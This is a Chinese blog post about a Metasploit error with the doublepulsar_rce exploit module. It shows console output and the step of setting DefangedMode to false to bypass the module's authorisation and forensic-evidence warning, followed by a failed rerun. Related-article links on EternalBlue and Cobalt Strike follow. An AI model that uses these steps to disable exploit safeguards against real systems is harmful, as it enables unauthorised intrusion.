doublepulsar msf 执行报错解决

最新推荐文章于 2025-06-08 04:41:31 发布
最新推荐文章于 2025-06-08 04:41:31 发布
阅读量9.3k 收藏 3
点赞数 2
CC 4.0 BY-SA版权
分类专栏: # poc+漏洞 文章标签: doublepulsar msf
本文为博主原创文章,未经博主允许可以转载。
本文链接:https://blog.youkuaiyun.com/helloexp/article/details/103368744
本文详细介绍了在使用Metasploit进行DoublePulsar远程代码执行漏洞扫描时遇到的报错问题及解决方案。通过调整DefangedMode选项,成功解决了因未授权而中止的扫描任务。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

doublepulsar msf 执行报错解决

在检查服务器是否存在漏洞的过程中,发现exploit 报错,
报错信息如下,已经很明显了 Disable the DefangedMode option if you have authorization to proceed. ,没有正确设置好参数

msf5 exploit(windows/smb/doublepulsar_rce) > exploit 

[*] Started reverse TCP handler on 192.168.124.144:4444 
[-] 192.168.124.134:445 - Exploit aborted due to failure: bad-config: 

Are you SURE you want to execute code against a nation-state implant?
You MAY contaminate forensic evidence if there is an investigation.

Disable the DefangedMode option if you have authorization to proceed.

[*] Exploit completed, but no session was created.

查看存在的值 有哪些可以设置

msf5 exploit(windows/smb/doublepulsar_rce) > set DefangedMode 
set DefangedMode false  set DefangedMode true

设置为 false
再执行就可以了

msf5 exploit(windows/smb/doublepulsar_rce) > exploit 

[*] Started reverse TCP handler on 192.168.124.144:4444 
[-] 192.168.124.134:445 - Exploit aborted due to failure: not-vulnerable: Unable to proceed without DOUBLEPULSAR
[*] Exploit completed, but no session was created.

以上
BR

红队专题--工作组域渗透
aming小老弟
12-21 1951
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
Metasploit(MSF)渗透测试之永恒之蓝实验
最新发布
weixin_36919275的博客
06-08 141
meterpreter中不仅有基本命令还有很多扩展库,下面就介绍一下常用的扩展库的查看方法。
解决win7嵌入式系统无法DoublePulsar问题
qq_32660043的博客
01-29 358
渗透过程中总是会遇到千奇百怪的问题,解决问题,并成功控制目标,是我们的首要任务。
ms12_020(DOS蓝屏攻击)
weixin_66469999的博客
11-08 2493
ms12_020(DOS蓝屏攻击)
使用Kali Linux Metasploit复现永恒之蓝
xujing19920814的博客
10-01 6791
使用Kali Linux Metasploit复现永恒之蓝
Windows网络服务渗透测试实战MS17-010漏洞复现
c_lanxiaofang的博客
05-16 3811
一、实验项目名称 Windows网络服务渗透测试实战MS17-010漏洞复现 二、实验目的及要求 熟悉Metasploit终端的使用方法; 掌握对MS17-010漏洞攻击的方法。 三、复现步骤(附加文字说明加截图) 1、NAT模式 Kali-Linux :192.168.232.141 Windows 7: 192.168.232.142 2、查看ip kali:ip a win7:ipconfig 3、重启网卡 service networking restart 4、测试是否连通 k
【漏洞利用】使用永恒之蓝的双倍脉冲模块(Eternalblue_doublepulsar)渗透攻击Win_7 32位主机
ATree的博客
12-20 1万+
使用这个模块本来是用来做攻击测试的,但是我始终没有测试成功,我大概花了1天半的时间,一直在研究为什么网上的文章里都显示测试成功了,我的就没有成功,一直在找原因,因为除了时间上的差异,kali模块增多,高版本的wine32软件,我真的不知道到底问题出在哪里了,就真的只好从这些方面入手去排查,从问题出发找原因,这个真的需要耐心,毅力。 我写的详细些,大家也就看的明白,这样就能保证你一次成功的概率比较...
41-渗透测试工具Cobalt strike-2.CS基础使用
XLbb的博客
05-29 2048
在kali中开启使用命令开启metasploit在靶机中使用Cobalt Strike创建一个windows/foreign/reverse_tcp的Listener。其中ip为Metasploit的ip地址(10.0.0.200),端口为Metasploit所监听的端口(7777)。如果有其他的主机上线,在增加会话中选择msf(的端口),该上线主机也能反弹shell这样我们就可以利用metaspliot中的相关工具,进行进一步渗透。
Vulnhub靶机渗透测试——DC-3
Cobra的博客
04-26 3534
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu16.04): 192.168.189.182 靶机下载地址:DC: 3.2 ~ VulnHub 二、信息收集 1、使用nmap扫描存活主机 2、发现IP192.168.189.182开放80端口,再对其进行nmap扫描 nmap -sV -A -T4 192.168.189.182 3、通过扫描结果我们发现其指纹信息为joomla,访问其80端口 4、使用dirsearch对其进行目.
MSF渗透永恒之蓝
nnjnknkj的博客
12-28 1125
MSF利用 永恒之蓝入侵
网络空间安全B模块加固(Windows篇)
m0_74485250的博客
06-11 653
网络空间安全加固模块
网络安全与Kali Linux:利用MSF对Win7进行永恒之蓝攻防演练实战
Kali与编程
09-11 1563
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali与编程,学习更多网络攻防干货! 基础知识介绍: 1.何为永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病
kali和主机防火墙的关闭与设置
xxxli_的博客
11-28 3340
kali和主机防火墙的关闭与设置
kali之永恒之蓝使用流程(操作全套步骤)
m0_63028223的博客
04-01 5386
kali之永恒之蓝使用流程
探秘DOUBLEPULSAR的克星:一键解密SMB植入流量的神器
gitblog_00025的博客
08-30 739
探秘DOUBLEPULSAR的克星:一键解密SMB植入流量的神器 在网络安全的最前线,隐藏着种种恶意软件与复杂的网络攻击手段。而今天,我们要向大家揭秘一个开源项目——一款由Luke Jennings打造的Python脚本,它专门用于解密由臭名昭著的DOUBLEPULSAR SMB植入物所产生的C2通信流量。这款工具,正如其作者所在的安全公司Countercept一样,站在保卫数字世界的前沿。 项目...
NSA泄密事件之SMB系列远程命令执行漏洞及Doublepulsar后门全球数据分析
weixin_34417200的博客
09-19 7326
本文讲的是NSA泄密事件之SMB系列远程命令执行漏洞及Doublepulsar后门全球数据分析, 1. 概述 2017 年 4 月 14 日,黑客组织Shadow Brokers 公布了一批新的NSA(美国国家安全局)黑客工具。这批黑客工具中含有可以配合使用的一个攻击框架和多个攻击漏洞。这次的工具主要面向的是Windows系统,攻击框架非常易用,漏...
how to use metasploit to attack
river
05-16 1103
I’m sorry for my english,0^0 (1) on kali2 start shell and input msfconsole here i will explain some args for msfconsole [+++++]. banner you would see banner for etasploit,which information useful...
msf报错connection reset by peer
08-20
你好!关于"msf报错connection reset by peer"的问题,这通常表示在Metasploit Framework (MSF) 的网络连接中,与远程服务器的连接被对方重置了。这可能是由于多种原因引起的,比如网络问题、防火墙设置或远程服务器问题。 解决此问题的一些方法包括: 1. 检查网络连接:确保你的网络连接正常,尝试使用其他工具或浏览器进行访问,查看是否存在网络问题。 2. 检查防火墙设置:如果你在使用防火墙,确保防火墙设置允许与MSF进行通信。你可以暂时禁用防火墙进行测试,看看是否仍然出现相同的问题。 3. 更新Metasploit Framework:确保你使用的是最新版本的MSF,升级到最新版本可能修复了一些已知的问题。 4. 检查远程服务器:如果你在尝试连接到特定的远程服务器时遇到问题,则可能是该服务器有问题。尝试连接到其他服务器进行测试,查看是否存在普遍性问题。 5. 检查MSF配置:检查MSF的配置文件,确认没有错误或冲突的设置。 如果以上方法都无法解决问题,你可以尝试在MSF的相关论坛或社区中寻求帮助,提供更详细的错误信息和上下文,以便其他人能够更好地帮助你解决问题。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿雷由

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值